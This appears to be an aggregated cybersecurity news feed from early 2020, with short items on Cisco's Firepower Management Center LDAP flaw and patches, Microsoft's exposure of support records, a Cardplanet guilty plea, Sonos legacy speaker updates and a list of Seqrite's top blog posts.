“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

The issue, Cisco explains, stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. It could be triggered by sending crafted HTTP requests to a vulnerable device, giving the attacker administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center devices configured to authenticate users of the web-based management interface through an external LDAP server are affected.

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw. It also announced patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6), due in February and May 2020, respectively.

The company confirmed that there are no workarounds that address this vulnerability. It also confirmed that the issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

Privacy watchdog throws wider net to protect children online

A new, comprehensive code will compel online services to put children's health and safety before data-collecting profits.

Lessons from Microsoft’s 250 million data record exposure

Microsoft has one of the best security teams and capabilities of any organization in the technology industry, yet it accidentally exposed 250 million customer records in December 2019. The data was accessible to anyone with a browser who knew the server location, for about a month in total, before an external researcher detected the problem. The database held records of customer support engagements dating back to 2005. Once alerted, Microsoft quickly closed the hole, investigated … More

The post Lessons from Microsoft’s 250 million data record exposure appeared first on Help Net Security.

Hashtag Trending – Amazon is most valuable brand ever; tech giants spending heavy on lobbying; Tesla hits milestone

Amazon officially becomes the most valuable brand of all time; tech giants set new record for money spent on lobbying; Tesla hits major milestone

When many of us think about Amazon, we likely think of a tech giant that has grown to be the world’s biggest company. But now, it is official that the company…

Russian Pleads Guilty to Running ‘CardPlanet’ to Sell Stolen Credit Cards

Image credit: Times of Israel. Aleksei Burkov, a 29-year-old Russian hacker, on Thursday pleaded guilty to multiple criminal charges for running two illegal websites that helped cyber criminals commit more than $20 million in credit card fraud. The first website Burkov operated was an online marketplace for buying and selling stolen credit card and debit card numbers—called Cardplanet—which

Sonos Backtracks to Offer Fixes for Legacy Speakers

Sonos appears to have bowed to customer pressure and will now offer security updates for legacy kit and ensure it can co-exist with newer systems.

The smart speaker firm issued a statement earlier this week warning that from May, “some of our oldest products will no longer receive software updates or new features.”

It claimed that the legacy products — Zone Players, Connect and Connect:Amp, first-generation Play:5, CR200, and Bridge — were “stretched to their technical limits.” The firm urged customers to buy new items and take their old kit to a recycling facility.

That stance drew criticism from customers concerned that they wouldn’t be able to use old speakers in concert with newer, supported equipment.

A furore also erupted over the firm’s roll-out of a “Recycle Mode” for legacy equipment, which was designed to protect consumers from unwittingly buying old speakers. It effectively removes all user information and permanently bricks the device in preparation for recycling. But it has been argued that by doing so, recycling firms can subsequently do nothing but strip it for parts, which is more wasteful.

To its credit, Sonos appears to have reversed its stance. In an apology published on Thursday, CEO Patrick Spence said the firm would continue to offer security updates for legacy purchases and would find a way for old and new equipment to work together.

“We are not bricking them, we are not forcing them into obsolescence, and we are not taking anything away. Many of you have invested heavily in your Sonos systems, and we intend to honor that investment for as long as possible,” he said.

“While legacy Sonos products won’t get new software features, we pledge to keep them updated with bug fixes and security patches for as long as possible. If we run into something core to the experience that can’t be addressed, we’ll work to offer an alternative solution and let you know about any changes you’ll see in your experience.”

Back in 2018, Trend Micro research warned that hackers could exploit flaws on internet-connected Sonos speakers to remotely control the devices themselves and infiltrate the networks they’re on.

This could present security challenges for corporates if remote workers have speakers operating on their home networks, it claimed.

Seqrite’s top ten most-read blogs in 2019

2019 was an action-packed year for cybersecurity. Nation-states continued their progress towards drafting data protection laws with the world still coming to terms with changing technologies in cybersecurity. Seqrite blogs analyzed the latest trends in the cybersecurity industry — here were the top ten most-read blogs of 2019.

1. Artificial Intelligence – its Use & Misuse

While the term ‘artificial intelligence’ continues to become more popular and conjure up images of the futuristic technology, it is important to understand what exactly it is. This article provides an explanation of artificial intelligence along with its functionalities in the cybersecurity space. It also articulates the various ways in which AI could be misused.

2. Can EVMs get hacked? We tell you the truth

The year 2019 saw momentous elections in countries as varied as India, the United Kingdom, Indonesia and Israel. The modern era of technology has given rise to various fears about whether Electronic Voting Machines (EVMs) can be hacked. This article analyzes such concerns and provides an answer.

3. This is how hackers can invade your system without installing malware

Attackers are exploiting systems through a dangerous new technique called fileless malware. This type of malware enters systems without alerting cybersecurity solutions, which makes it very dangerous. This article explains how attacks are deployed using this malware and how to prevent them.

4. Employees working on their personal device? Here’s how to secure them

The Bring Your Own Device revolution has heralded a huge rise in the number of personal devices on the enterprise network. While employees love using their own personal devices for work, this practice carries its own security risks, and this article explains how to secure personal devices.

5. The banking sector’s top cybersecurity challenges

In the last few years, the banking sector has seen some major cyber attacks that have resulted in damaging financial repercussions. This is a sector at great risk from cybersecurity challenges, and this article explains how to deal with some of the top ones.

6. 5 Cybersecurity Best Practices For Your Small to Medium-Size Business

Small to Medium-Size Businesses (SMEs) often underestimate cybersecurity risks under a mistaken assumption that they will not be targeted by attackers. Ironically, they could actually be at a higher risk. This article outlines the top 5 cybersecurity best practices for SMEs.

7. The healthcare industry’s largest cyber challenges

The healthcare sector suffers a tremendous number of cyber attacks every year. The cost of cyber attacks on healthcare can also be devastating, as they can have life-and-death consequences. This article explains why the healthcare industry represents such a big cyber risk and what challenges it faces.

8. What happens when you don’t patch your software?

In 2017, the WannaCry ransomware caused chaos on more than 300,000 systems across different countries. The scale of the attack was momentous, and its root cause was unpatched systems. This article highlights the danger of letting systems remain unpatched and the troubling consequences that can follow.

9. How to reduce the cost of data leakage when an employee is Out Of Office

Vacation periods often see a spike in cyber attacks as employees get carried away and become negligent about cybersecurity. It’s important for enterprises to understand this and invest in solutions like Data Loss Prevention (DLP). This article provides some solutions on how to ensure enterprise cybersecurity remains robust while employees are Out of Office.

10. Cybersecurity roundup – January to April 2019

The first four months of the year saw a flurry of cyberattacks from across the globe. Whether it was Facebook accidentally uploading email contacts of 1.5 million users or personal data of German politicians being leaked, this article provides an overview of the top cybersecurity news between January and April 2019.

Did we miss out on anything? Tell us!

The post Seqrite’s top ten most-read blogs in 2019 appeared first on Seqrite Blog.